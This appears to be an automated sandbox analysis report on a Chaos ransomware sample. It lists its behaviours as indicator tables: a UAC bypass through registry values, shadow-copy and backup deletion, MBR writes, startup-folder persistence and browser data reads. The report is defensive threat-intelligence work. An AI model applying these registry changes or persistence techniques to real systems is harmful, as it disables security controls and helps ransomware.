Analysis Overview
Threat Level: Known bad
The file http://q was found to be: Known bad.
Malicious Activity Summary
Chaos
Chaos Ransomware
UAC bypass
Deletes shadow copies
Looks for VirtualBox drivers on disk
Modifies boot configuration data using bcdedit
Disables Task Manager via registry modification
Deletes backup catalog
Downloads MZ/PE file
Loads dropped DLL
Executes dropped EXE
Checks computer location settings
Reads user/profile data of web browsers
UPX packed file
Drops startup file
Looks up external IP address via web service
Enumerates connected drives
Writes to the Master Boot Record (MBR)
Adds Run key to start application
Drops desktop.ini file(s)
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
Sets desktop wallpaper using registry
Detected potential entity reuse from brand microsoft.
Drops file in System32 directory
Drops file in Windows directory
Enumerates physical storage devices
Detects Pyinstaller
Modifies registry key
Enumerates system info in registry
Interacts with shadow copies
Suspicious use of AdjustPrivilegeToken
Runs ping.exe
Kills process with taskkill
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of SetWindowsHookEx
Suspicious use of FindShellTrayWindow
Runs net.exe
Enumerates processes with tasklist
Checks SCSI registry key(s)
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Modifies data under HKEY_USERS
Delays execution with timeout.exe
Modifies registry class
Suspicious behavior: AddClipboardFormatListener
Suspicious use of SendNotifyMessage
Views/modifies file attributes
Uses Volume Shadow Copy service COM API
Suspicious behavior: GetForegroundWindowSpam
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-05-05 19:57
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-05 19:57
Reported
2024-05-05 20:11
Platform
win10v2004-20240426-en
Max time kernel
863s
Max time network
864s
Command Line
Signatures
Chaos
Chaos Ransomware
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
Deletes shadow copies
Looks for VirtualBox drivers on disk
| Description | Indicator | Process | Target |
| File opened (read-only) | C:\WINDOWS\system32\drivers\VBoxMouse.sys | C:\Users\Admin\Downloads\Synapse\Synapse X Launcher.exe | N/A |
| File opened (read-only) | C:\WINDOWS\system32\drivers\VBoxMouse.sys | C:\Users\Admin\AppData\Local\Temp\Synapse X Launcher.exe | N/A |
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Deletes backup catalog
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\wbadmin.exe | N/A |
Disables Task Manager via registry modification
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Windows\Temp\{28C2D7A4-FF25-481F-83BA-E14CC69E1AE7}\.cr\VC_redist.x64.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\ScaryInstaller.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\63FF.tmp\Cov29Cry.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\cmd.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\run.bat | C:\Users\Admin\Downloads\Synapse\Synapse X Launcher.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.url | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\covid29-is-here.txt | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\{c649ede4-f16a-4486-a117-dcc2f2a35165} = "\"C:\\ProgramData\\Package Cache\\{c649ede4-f16a-4486-a117-dcc2f2a35165}\\VC_redist.x64.exe\" /burn.runonce" | C:\Windows\Temp\{E11A2202-3380-471E-8BB5-E36088F32B02}\.be\VC_redist.x64.exe | N/A |
Checks installed software on the system
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AccountPictures\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Public\Music\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\Desktop\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Public\Pictures\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Public\Desktop\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\Contacts\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\Camera Roll\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | F:\$RECYCLE.BIN\S-1-5-21-1162180587-977231257-2194346871-1000\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\Links\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\Documents\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\Music\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\Videos\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\Favorites\Links\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\Searches\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\Saved Pictures\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\OneDrive\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\Saved Games\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\Favorites\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Public\Documents\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Public\Videos\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\T: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\msiexec.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\AppData\Local\Temp\63FF.tmp\mbr.exe | N/A |
Detected potential entity reuse from brand microsoft.
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\msvcp140.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\system32\msvcp140_2.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\msvcp140.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\vcruntime140.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\system32\mfc140jpn.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\mfc140jpn.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\mfc140rus.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\system32\vcruntime140_1.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\system32\msvcp140_atomic_wait.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\msvcp140_2.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\system32\mfc140chs.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\system32\mfc140ita.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\mfc140.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\msvcp140_codecvt_ids.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\system32\mfc140cht.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSStmp.log | C:\Windows\System32\svchost.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSSres00002.jrs | C:\Windows\System32\svchost.exe | N/A |
| File created | C:\Windows\system32\mfc140ita.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.dat | C:\Windows\System32\svchost.exe | N/A |
| File created | C:\Windows\system32\msvcp140_1.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\system32\mfc140.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\mfcm140u.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.jcp | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\mfc140enu.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.jtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\vcomp140.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\system32\mfc140deu.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\vccorlib140.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\mfc140enu.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\mfc140esn.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\system32\msvcp140_1.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\system32\msvcp140_codecvt_ids.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\vcruntime140_threads.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\system32\mfcm140u.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\system32\mfc140esn.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\system32\mfc140rus.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.log | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\vcruntime140.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\msvcp140_atomic_wait.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\vcamp140.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\system32\mfcm140.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\mfc140cht.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\mfc140deu.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\system32\vccorlib140.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\concrt140.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\vcomp140.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\mfc140u.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\mfcm140.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.chk | C:\Windows\System32\svchost.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.jfm | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.dat | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\concrt140.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\mfc140fra.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\system32\mfc140u.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\mfc140chs.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.chk | C:\Windows\System32\svchost.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSSres00001.jrs | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\vcamp140.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\vcruntime140_1.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\system32\mfc140fra.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\system32\mfc140kor.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\mfc140kor.dll | C:\Windows\system32\msiexec.exe | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\7iitjvsua.jpg" | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\Desktop\Wallpaper = "c:\\bg.bmp" | C:\Windows\SysWOW64\reg.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Installer\SourceHash{19AFE054-CA83-45D5-A9DB-4108EF4BD391} | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Windows\system32\mspaint.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\e5de525.msi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\e5de526.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\e5de526.msi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\e5de513.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\ | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\SourceHash{AA0C8AB5-7297-4D46-A0D9-08096FE59E46} | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIE64C.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIE737.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIE8FD.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\e5de53b.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\e5de513.msi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\inprogressinstallinfo.ipi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIE9D9.tmp | C:\Windows\system32\msiexec.exe | N/A |
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Enumerates physical storage devices
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | C:\Windows\System32\vds.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters | C:\Windows\system32\vssvc.exe | N/A |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr | C:\Windows\system32\vssvc.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000f9c3b1b881b13bb50000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000f9c3b1b80000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff000000000700010000680900f9c3b1b8000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1df9c3b1b8000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000f9c3b1b800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\system32\vssvc.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\system32\vssvc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName | C:\Windows\System32\vds.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters | C:\Windows\system32\vssvc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 | C:\Windows\System32\vds.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | C:\Windows\System32\vds.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
